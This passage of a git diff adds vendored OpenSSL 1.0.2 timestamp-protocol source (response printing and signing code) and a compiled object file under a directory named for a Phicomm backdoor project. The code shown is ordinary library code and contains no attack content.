+        TS_ACCURACY_print_bio(bio, accuracy);
+    BIO_write(bio, "\n", 1);
+
+    /* Print ordering. */
+    BIO_printf(bio, "Ordering: %s\n",
+               TS_TST_INFO_get_ordering(a) ? "yes" : "no");
+
+    /* Print nonce. */
+    BIO_printf(bio, "Nonce: ");
+    nonce = TS_TST_INFO_get_nonce(a);
+    if (nonce == NULL)
+        BIO_printf(bio, "unspecified");
+    else
+        TS_ASN1_INTEGER_print_bio(bio, nonce);
+    BIO_write(bio, "\n", 1);
+
+    /* Print TSA name. */
+    BIO_printf(bio, "TSA: ");
+    tsa_name = TS_TST_INFO_get_tsa(a);
+    if (tsa_name == NULL)
+        BIO_printf(bio, "unspecified");
+    else {
+        STACK_OF(CONF_VALUE) *nval;
+        if ((nval = i2v_GENERAL_NAME(NULL, tsa_name, NULL)))
+            X509V3_EXT_val_prn(bio, nval, 0, 0);
+        sk_CONF_VALUE_pop_free(nval, X509V3_conf_free);
+    }
+    BIO_write(bio, "\n", 1);
+
+    /* Print extensions. */
+    TS_ext_print_bio(bio, TS_TST_INFO_get_exts(a));
+
+    return 1;
+}
+
+static int TS_ACCURACY_print_bio(BIO *bio, const TS_ACCURACY *accuracy)
+{
+    const ASN1_INTEGER *seconds = TS_ACCURACY_get_seconds(accuracy);
+    const ASN1_INTEGER *millis = TS_ACCURACY_get_millis(accuracy);
+    const ASN1_INTEGER *micros = TS_ACCURACY_get_micros(accuracy);
+
+    if (seconds != NULL)
+        TS_ASN1_INTEGER_print_bio(bio, seconds);
+    else
+        BIO_printf(bio, "unspecified");
+    BIO_printf(bio, " seconds, ");
+    if (millis != NULL)
+        TS_ASN1_INTEGER_print_bio(bio, millis);
+    else
+        BIO_printf(bio, "unspecified");
+    BIO_printf(bio, " millis, ");
+    if (micros != NULL)
+        TS_ASN1_INTEGER_print_bio(bio, micros);
+    else
+        BIO_printf(bio, "unspecified");
+    BIO_printf(bio, " micros");
+
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts_rsp_print.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts_rsp_print.o
new file mode 100644
index 0000000000000000000000000000000000000000..ae2c217f3d95eb0f3221141455a48545e0ca2c04
GIT binary patch
literal 9888
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts_rsp_sign.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts_rsp_sign.c
new file mode 100644
index 0000000..db6ce32
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts_rsp_sign.c
@@ -0,0 +1,1020 @@
+/* crypto/ts/ts_resp_sign.c */
+/*
+ * Written by Zoltan Glozik (zglozik@stones.com) for the OpenSSL project
+ * 2002.
+ */
+/* ====================================================================
+ * Copyright (c) 2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include "cryptlib.h"
+
+#if defined(OPENSSL_SYS_UNIX)
+# include <sys/time.h>
+#endif
+
+#include <openssl/objects.h>
+#include <openssl/ts.h>
+#include <openssl/pkcs7.h>
+
+/* Private function declarations. */
+
+static ASN1_INTEGER *def_serial_cb(struct TS_resp_ctx *, void *);
+static int def_time_cb(struct TS_resp_ctx *, void *, long *sec, long *usec);
+static int def_extension_cb(struct TS_resp_ctx *, X509_EXTENSION *, void *);
+
+static void TS_RESP_CTX_init(TS_RESP_CTX *ctx);
+static void TS_RESP_CTX_cleanup(TS_RESP_CTX *ctx);
+static int TS_RESP_check_request(TS_RESP_CTX *ctx);
+static ASN1_OBJECT *TS_RESP_get_policy(TS_RESP_CTX *ctx);
+static TS_TST_INFO *TS_RESP_create_tst_info(TS_RESP_CTX *ctx,
+                                            ASN1_OBJECT *policy);
+static int TS_RESP_process_extensions(TS_RESP_CTX *ctx);
+static int TS_RESP_sign(TS_RESP_CTX *ctx);
+
+static ESS_SIGNING_CERT *ESS_SIGNING_CERT_new_init(X509 *signcert,
+                                                   STACK_OF(X509) *certs);
+static ESS_CERT_ID *ESS_CERT_ID_new_init(X509 *cert, int issuer_needed);
+static int TS_TST_INFO_content_new(PKCS7 *p7);
+static int ESS_add_signing_cert(PKCS7_SIGNER_INFO *si, ESS_SIGNING_CERT *sc);
+
+static ASN1_GENERALIZEDTIME
+*TS_RESP_set_genTime_with_precision(ASN1_GENERALIZEDTIME *, long, long,
+                                    unsigned);
+
+/* Default callbacks for response generation. */
+
+static ASN1_INTEGER *def_serial_cb(struct TS_resp_ctx *ctx, void *data)
+{
+    ASN1_INTEGER *serial = ASN1_INTEGER_new();
+    if (!serial)
+        goto err;
+    if (!ASN1_INTEGER_set(serial, 1))
+        goto err;
+    return serial;
+ err:
+    TSerr(TS_F_DEF_SERIAL_CB, ERR_R_MALLOC_FAILURE);
+    TS_RESP_CTX_set_status_info(ctx, TS_STATUS_REJECTION,
+                                "Error during serial number generation.");
+    return NULL;
+}
+
+#if defined(OPENSSL_SYS_UNIX)
+
+/* Use the gettimeofday function call. */
+static int def_time_cb(struct TS_resp_ctx *ctx, void *data,
+                       long *sec, long *usec)
+{
+    struct timeval tv;
+    if (gettimeofday(&tv, NULL) != 0) {
+        TSerr(TS_F_DEF_TIME_CB, TS_R_TIME_SYSCALL_ERROR);
+        TS_RESP_CTX_set_status_info(ctx, TS_STATUS_REJECTION,
+                                    "Time is not available.");
+        TS_RESP_CTX_add_failure_info(ctx, TS_INFO_TIME_NOT_AVAILABLE);
+        return 0;
+    }
+    /* Return time to caller. */
+    *sec = tv.tv_sec;
+    *usec = tv.tv_usec;
+
+    return 1;
+}
+
+#else
+
+/* Use the time function call that provides only seconds precision. */
+static int def_time_cb(struct TS_resp_ctx *ctx, void *data,
+                       long *sec, long *usec)
+{
+    time_t t;
+    if (time(&t) == (time_t)-1) {
+        TSerr(TS_F_DEF_TIME_CB, TS_R_TIME_SYSCALL_ERROR);
+        TS_RESP_CTX_set_status_info(ctx, TS_STATUS_REJECTION,
+                                    "Time is not available.");
+        TS_RESP_CTX_add_failure_info(ctx, TS_INFO_TIME_NOT_AVAILABLE);
+        return 0;
+    }
+    /* Return time to caller, only second precision. */
+    *sec = (long)t;
+    *usec = 0;
+
+    return 1;
+}
+
+#endif
+
+static int def_extension_cb(struct TS_resp_ctx *ctx, X509_EXTENSION *ext,
+                            void *data)
+{
+    /* No extensions are processed here. */
+    TS_RESP_CTX_set_status_info(ctx, TS_STATUS_REJECTION,
+                                "Unsupported extension.");
+    TS_RESP_CTX_add_failure_info(ctx, TS_INFO_UNACCEPTED_EXTENSION);
+    return 0;
+}
+
+/* TS_RESP_CTX management functions. */
+
+TS_RESP_CTX *TS_RESP_CTX_new()
+{
+    TS_RESP_CTX *ctx;
+
+    if (!(ctx = (TS_RESP_CTX *)OPENSSL_malloc(sizeof(TS_RESP_CTX)))) {
+        TSerr(TS_F_TS_RESP_CTX_NEW, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+    memset(ctx, 0, sizeof(TS_RESP_CTX));
+
+    /* Setting default callbacks. */
+    ctx->serial_cb = def_serial_cb;
+    ctx->time_cb = def_time_cb;
+    ctx->extension_cb = def_extension_cb;
+
+    return ctx;
+}
+
+void TS_RESP_CTX_free(TS_RESP_CTX *ctx)
+{
+    if (!ctx)
+        return;
+
+    X509_free(ctx->signer_cert);
+    EVP_PKEY_free(ctx->signer_key);
+    sk_X509_pop_free(ctx->certs, X509_free);
+    sk_ASN1_OBJECT_pop_free(ctx->policies, ASN1_OBJECT_free);
+    ASN1_OBJECT_free(ctx->default_policy);
+    sk_EVP_MD_free(ctx->mds);   /* No EVP_MD_free method exists. */
+    ASN1_INTEGER_free(ctx->seconds);
+    ASN1_INTEGER_free(ctx->millis);
+    ASN1_INTEGER_free(ctx->micros);
+    OPENSSL_free(ctx);
+}
+
+int TS_RESP_CTX_set_signer_cert(TS_RESP_CTX *ctx, X509 *signer)
+{
+    if (X509_check_purpose(signer, X509_PURPOSE_TIMESTAMP_SIGN, 0) != 1) {
+        TSerr(TS_F_TS_RESP_CTX_SET_SIGNER_CERT,
+              TS_R_INVALID_SIGNER_CERTIFICATE_PURPOSE);
+        return 0;
+    }
+    if (ctx->signer_cert)
+        X509_free(ctx->signer_cert);
+    ctx->signer_cert = signer;
+    CRYPTO_add(&ctx->signer_cert->references, +1, CRYPTO_LOCK_X509);
+    return 1;
+}
+
+int TS_RESP_CTX_set_signer_key(TS_RESP_CTX *ctx, EVP_PKEY *key)
+{
+    if (ctx->signer_key)
+        EVP_PKEY_free(ctx->signer_key);
+    ctx->signer_key = key;
+    CRYPTO_add(&ctx->signer_key->references, +1, CRYPTO_LOCK_EVP_PKEY);
+
+    return 1;
+}
+
+int TS_RESP_CTX_set_def_policy(TS_RESP_CTX *ctx, ASN1_OBJECT *def_policy)
+{
+    if (ctx->default_policy)
+        ASN1_OBJECT_free(ctx->default_policy);
+    if (!(ctx->default_policy = OBJ_dup(def_policy)))
+        goto err;
+    return 1;
+ err:
+    TSerr(TS_F_TS_RESP_CTX_SET_DEF_POLICY, ERR_R_MALLOC_FAILURE);
+    return 0;
+}
+
+int TS_RESP_CTX_set_certs(TS_RESP_CTX *ctx, STACK_OF(X509) *certs)
+{
+
+    if (ctx->certs) {
+        sk_X509_pop_free(ctx->certs, X509_free);
+        ctx->certs = NULL;
+    }
+    if (!certs)
+        return 1;
+    if (!(ctx->certs = X509_chain_up_ref(certs))) {
+        TSerr(TS_F_TS_RESP_CTX_SET_CERTS, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+
+    return 1;
+}
+
+int TS_RESP_CTX_add_policy(TS_RESP_CTX *ctx, ASN1_OBJECT *policy)
+{
+    ASN1_OBJECT *copy = NULL;
+
+    /* Create new policy stack if necessary. */
+    if (!ctx->policies && !(ctx->policies = sk_ASN1_OBJECT_new_null()))
+        goto err;
+    if (!(copy = OBJ_dup(policy)))
+        goto err;
+    if (!sk_ASN1_OBJECT_push(ctx->policies, copy))
+        goto err;
+
+    return 1;
+ err:
+    TSerr(TS_F_TS_RESP_CTX_ADD_POLICY, ERR_R_MALLOC_FAILURE);
+    ASN1_OBJECT_free(copy);
+    return 0;
+}
+
+int TS_RESP_CTX_add_md(TS_RESP_CTX *ctx, const EVP_MD *md)
+{
+    /* Create new md stack if necessary. */
+    if (!ctx->mds && !(ctx->mds = sk_EVP_MD_new_null()))
+        goto err;
+    /* Add the shared md, no copy needed. */
+    if (!sk_EVP_MD_push(ctx->mds, (EVP_MD *)md))
+        goto err;
+
+    return 1;
+ err:
+    TSerr(TS_F_TS_RESP_CTX_ADD_MD, ERR_R_MALLOC_FAILURE);
+    return 0;
+}
+
+#define TS_RESP_CTX_accuracy_free(ctx)          \
+        ASN1_INTEGER_free(ctx->seconds);        \
+        ctx->seconds = NULL;                    \
+        ASN1_INTEGER_free(ctx->millis);         \
+        ctx->millis = NULL;                     \
+        ASN1_INTEGER_free(ctx->micros);         \
+        ctx->micros = NULL;
+
+int TS_RESP_CTX_set_accuracy(TS_RESP_CTX *ctx,
+                             int secs, int millis, int micros)
+{
+
+    TS_RESP_CTX_accuracy_free(ctx);
+    if (secs && (!(ctx->seconds = ASN1_INTEGER_new())
+                 || !ASN1_INTEGER_set(ctx->seconds, secs)))
+        goto err;
+    if (millis && (!(ctx->millis = ASN1_INTEGER_new())
+                   || !ASN1_INTEGER_set(ctx->millis, millis)))
+        goto err;
+    if (micros && (!(ctx->micros = ASN1_INTEGER_new())
+                   || !ASN1_INTEGER_set(ctx->micros, micros)))
+        goto err;
+
+    return 1;
+ err:
+    TS_RESP_CTX_accuracy_free(ctx);
+    TSerr(TS_F_TS_RESP_CTX_SET_ACCURACY, ERR_R_MALLOC_FAILURE);
+    return 0;
+}
+
+void TS_RESP_CTX_add_flags(TS_RESP_CTX *ctx, int flags)
+{
+    ctx->flags |= flags;
+}
+
+void TS_RESP_CTX_set_serial_cb(TS_RESP_CTX *ctx, TS_serial_cb cb, void *data)
+{
+    ctx->serial_cb = cb;
+    ctx->serial_cb_data = data;
+}
+
+void TS_RESP_CTX_set_time_cb(TS_RESP_CTX *ctx, TS_time_cb cb, void *data)
+{
+    ctx->time_cb = cb;
+    ctx->time_cb_data = data;
+}
+
+void TS_RESP_CTX_set_extension_cb(TS_RESP_CTX *ctx,
+                                  TS_extension_cb cb, void *data)
+{
+    ctx->extension_cb = cb;
+    ctx->extension_cb_data = data;
+}
+
+int TS_RESP_CTX_set_status_info(TS_RESP_CTX *ctx,
+                                int status, const char *text)
+{
+    TS_STATUS_INFO *si = NULL;
+    ASN1_UTF8STRING *utf8_text = NULL;
+    int ret = 0;
+
+    if (!(si = TS_STATUS_INFO_new()))
+        goto err;
+    if (!ASN1_INTEGER_set(si->status, status))
+        goto err;
+    if (text) {
+        if (!(utf8_text = ASN1_UTF8STRING_new())
+            || !ASN1_STRING_set(utf8_text, text, strlen(text)))
+            goto err;
+        if (!si->text && !(si->text = sk_ASN1_UTF8STRING_new_null()))
+            goto err;
+        if (!sk_ASN1_UTF8STRING_push(si->text, utf8_text))
+            goto err;
+        utf8_text = NULL;       /* Ownership is lost. */
+    }
+    if (!TS_RESP_set_status_info(ctx->response, si))
+        goto err;
+    ret = 1;
+ err:
+    if (!ret)
+        TSerr(TS_F_TS_RESP_CTX_SET_STATUS_INFO, ERR_R_MALLOC_FAILURE);
+    TS_STATUS_INFO_free(si);
+    ASN1_UTF8STRING_free(utf8_text);
+    return ret;
+}
+
+int TS_RESP_CTX_set_status_info_cond(TS_RESP_CTX *ctx,
+                                     int status, const char *text)
+{
+    int ret = 1;
+    TS_STATUS_INFO *si = TS_RESP_get_status_info(ctx->response);
+
+    if (ASN1_INTEGER_get(si->status) == TS_STATUS_GRANTED) {
+        /* Status has not been set, set it now. */
+        ret = TS_RESP_CTX_set_status_info(ctx, status, text);
+    }
+    return ret;
+}
+
+int TS_RESP_CTX_add_failure_info(TS_RESP_CTX *ctx, int failure)
+{
+    TS_STATUS_INFO *si = TS_RESP_get_status_info(ctx->response);
+    if (!si->failure_info && !(si->failure_info = ASN1_BIT_STRING_new()))
+        goto err;
+    if (!ASN1_BIT_STRING_set_bit(si->failure_info, failure, 1))
+        goto err;
+    return 1;
+ err:
+    TSerr(TS_F_TS_RESP_CTX_ADD_FAILURE_INFO, ERR_R_MALLOC_FAILURE);
+    return 0;
+}
+
+TS_REQ *TS_RESP_CTX_get_request(TS_RESP_CTX *ctx)
+{
+    return ctx->request;
+}
+
+TS_TST_INFO *TS_RESP_CTX_get_tst_info(TS_RESP_CTX *ctx)
+{
+    return ctx->tst_info;
+}
+
+int TS_RESP_CTX_set_clock_precision_digits(TS_RESP_CTX *ctx,
+                                           unsigned precision)
+{
+    if (precision > TS_MAX_CLOCK_PRECISION_DIGITS)
+        return 0;
+    ctx->clock_precision_digits = precision;
+    return 1;
+}
+
+/* Main entry method of the response generation. */
+TS_RESP *TS_RESP_create_response(TS_RESP_CTX *ctx, BIO *req_bio)
+{
+    ASN1_OBJECT *policy;
+    TS_RESP *response;
+    int result = 0;
+
+    TS_RESP_CTX_init(ctx);
+
+    /* Creating the response object. */
+    if (!(ctx->response = TS_RESP_new())) {
+        TSerr(TS_F_TS_RESP_CREATE_RESPONSE, ERR_R_MALLOC_FAILURE);
+        goto end;
+    }
+
+    /* Parsing DER request. */
+    if (!(ctx->request = d2i_TS_REQ_bio(req_bio, NULL))) {
+        TS_RESP_CTX_set_status_info(ctx, TS_STATUS_REJECTION,
+                                    "Bad request format or " "system error.");
+        TS_RESP_CTX_add_failure_info(ctx, TS_INFO_BAD_DATA_FORMAT);
+        goto end;
+    }
+
+    /* Setting default status info. */
+    if (!TS_RESP_CTX_set_status_info(ctx, TS_STATUS_GRANTED, NULL))
+        goto end;
+
+    /* Checking the request format. */
+    if (!TS_RESP_check_request(ctx))
+        goto end;
+
+    /* Checking acceptable policies. */
+    if (!(policy = TS_RESP_get_policy(ctx)))
+        goto end;
+
+    /* Creating the TS_TST_INFO object. */
+    if (!(ctx->tst_info = TS_RESP_create_tst_info(ctx, policy)))
+        goto end;
+
+    /* Processing extensions. */
+    if (!TS_RESP_process_extensions(ctx))
+        goto end;
+
+    /* Generating the signature. */
+    if (!TS_RESP_sign(ctx))
+        goto end;
+
+    /* Everything was successful. */
+    result = 1;
+ end:
+    if (!result) {
+        TSerr(TS_F_TS_RESP_CREATE_RESPONSE, TS_R_RESPONSE_SETUP_ERROR);
+        if (ctx->response != NULL) {
+            if (TS_RESP_CTX_set_status_info_cond(ctx,
+                                                 TS_STATUS_REJECTION,
+                                                 "Error during response "
+                                                 "generation.") == 0) {
+                TS_RESP_free(ctx->response);
+                ctx->response = NULL;
+            }
+        }
+    }
+    response = ctx->response;
+    ctx->response = NULL;       /* Ownership will be returned to caller. */
+    TS_RESP_CTX_cleanup(ctx);
+    return response;
+}
+
+/* Initializes the variable part of the context. */
+static void TS_RESP_CTX_init(TS_RESP_CTX *ctx)
+{
+    ctx->request = NULL;
+    ctx->response = NULL;
+    ctx->tst_info = NULL;
+}
+
+/* Cleans up the variable part of the context. */
+static void TS_RESP_CTX_cleanup(TS_RESP_CTX *ctx)
+{
+    TS_REQ_free(ctx->request);
+    ctx->request = NULL;
+    TS_RESP_free(ctx->response);
+    ctx->response = NULL;
+    TS_TST_INFO_free(ctx->tst_info);
+    ctx->tst_info = NULL;
+}
+
+/* Checks the format and content of the request. */
+static int TS_RESP_check_request(TS_RESP_CTX *ctx)
+{
+    TS_REQ *request = ctx->request;
+    TS_MSG_IMPRINT *msg_imprint;
+    X509_ALGOR *md_alg;
+    int md_alg_id;
+    const ASN1_OCTET_STRING *digest;
+    EVP_MD *md = NULL;
+    int i;
+
+    /* Checking request version. */
+    if (TS_REQ_get_version(request) != 1) {
+        TS_RESP_CTX_set_status_info(ctx, TS_STATUS_REJECTION,
+                                    "Bad request version.");
+        TS_RESP_CTX_add_failure_info(ctx, TS_INFO_BAD_REQUEST);
+        return 0;
+    }
+
+    /* Checking message digest algorithm. */
+    msg_imprint = TS_REQ_get_msg_imprint(request);
+    md_alg = TS_MSG_IMPRINT_get_algo(msg_imprint);
+    md_alg_id = OBJ_obj2nid(md_alg->algorithm);
+    for (i = 0; !md && i < sk_EVP_MD_num(ctx->mds); ++i) {
+        EVP_MD *current_md = sk_EVP_MD_value(ctx->mds, i);
+        if (md_alg_id == EVP_MD_type(current_md))
+            md = current_md;
+    }
+    if (!md) {
+        TS_RESP_CTX_set_status_info(ctx, TS_STATUS_REJECTION,
+                                    "Message digest algorithm is "
+                                    "not supported.");
+        TS_RESP_CTX_add_failure_info(ctx, TS_INFO_BAD_ALG);
+        return 0;
+    }
+
+    /* No message digest takes parameter. */
+    if (md_alg->parameter && ASN1_TYPE_get(md_alg->parameter) != V_ASN1_NULL) {
+        TS_RESP_CTX_set_status_info(ctx, TS_STATUS_REJECTION,
+                                    "Superfluous message digest "
+                                    "parameter.");
+        TS_RESP_CTX_add_failure_info(ctx, TS_INFO_BAD_ALG);
+        return 0;
+    }
+    /* Checking message digest size. */
+    digest = TS_MSG_IMPRINT_get_msg(msg_imprint);
+    if (digest->length != EVP_MD_size(md)) {
+        TS_RESP_CTX_set_status_info(ctx, TS_STATUS_REJECTION,
